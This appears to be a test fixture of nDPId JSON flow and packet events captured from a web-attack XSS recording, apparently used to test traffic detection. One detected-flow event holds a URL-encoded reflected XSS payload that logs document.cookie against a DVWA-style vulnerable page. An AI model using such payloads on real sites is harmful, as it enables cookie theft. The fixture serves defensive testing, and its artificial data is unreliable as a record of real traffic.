+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1499347156631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347156631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OClAAD4Gja+sEAABwKgKMtO6AFAdhZhZPg0DvoAQAOUbxAAAAQEICgE5oHAD43Hn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347159323,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347159323,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ly1AAD4GlqOsEAABwKgKMtPUAFBviYw8AAAAAKACchDqzgAAAgQFtAQCCAoBOaMRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ09Q7Unbob4mMPaAScSDBBwAAAgQFtAQCCAoD43SIATmjEQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1499347159323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ly5AAD4GlqqsEAABwKgKMtPUAFBviYw9O1J26YAQAOVgDgAAAQEICgE5oxID43SI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347160581,"flow_last_seen":1499347160581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160581,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1499347160581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eT9AAD4GTJGsEAABwKgKMtPiAFBG+91zAAAAAKACchDA3AAAAgQFtAQCCAoBOaRMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1499347160581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0+J0ull0RvvddKAScSB55wAAAgQFtAQCCAoD43XCATmkTAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1499347160582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347160582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eUBAAD4GTJisEAABwKgKMtPiAFBG+910dLpZdYAQAOUY7wAAAQEICgE5pEwD43XC"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347163177,"flow_last_seen":1499347163177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347163177,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1499347163177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YKVAAD4GZSusEAABwKgKMtP8AFCcucZwAAAAAKACchB\/fgAAAgQFtAQCCAoBOabVAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1499347163177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0\/zGVu0LnLnGcaAScSBQzAAAAgQFtAQCCAoD43hLATmm1QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":3,"flow_last_seen":1499347163178,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347163178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YKZAAD4GZTKsEAABwKgKMtP8AFCcucZxxlbtDIAQAOXv0wAAAQEICgE5ptUD43hL"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347164459,"flow_last_seen":1499347164459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347164459,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1499347164459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yU1AAD4G\/IKsEAABwKgKMtQKAFBoaGFbAAAAAKACchAXlgAAAgQFtAQCCAoBOagWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1499347164459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ArCPOEyaGhhXKAScSD3lQAAAgQFtAQCCAoD43mMATmoFgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1499347164460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347164460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yU5AAD4G\/ImsEAABwKgKMtQKAFBoaGFcwjzhM4AQAOWWnQAAAQEICgE5qBYD43mM"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347165741,"flow_last_seen":1499347165741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347165741,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1499347165741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vRVAAD4GCLusEAABwKgKMtQYAFCo9hRDAAAAAKACchAi0gAAAgQFtAQCCAoBOalWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1499347165741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1BjYjd6VqPYURKAScSDt3QAAAgQFtAQCCAoD43rMATmpVgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1499347165742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347165742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vRZAAD4GCMKsEAABwKgKMtQYAFCo9hRE2I3eloAQAOWM5QAAAQEICgE5qVYD43rM"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347168302,"flow_last_seen":1499347168302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347168302,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1499347168302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pdZAAD4GH\/qsEAABwKgKMtQyAFAP+Q4AAAAAAKACchC\/eAAAAgQFtAQCCAoBOavWAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1499347168302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1DJusJVZD\/kOAaAScSA7HQAAAgQFtAQCCAoD431NATmr1gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1499347168303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347168303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pddAAD4GIAGsEAABwKgKMtQyAFAP+Q4BbrCVWoAQAOXaIwAAAQEICgE5q9cD431N"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347169573,"flow_last_seen":1499347169573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347169573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1499347169573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83TtAAD4G6JSsEAABwKgKMtRAAFDvZ3AvAAAAAKACchB8jgAAAgQFtAQCCAoBOa0UAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1499347169574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1EA8SVzP72dwMKAScSBh5gAAAgQFtAQCCAoD436LATmtFAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1499347169574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347169574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TxAAD4G6JusEAABwKgKMtRAAFDvZ3AwPElc0IAQAOUA7gAAAQEICgE5rRQD436L"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 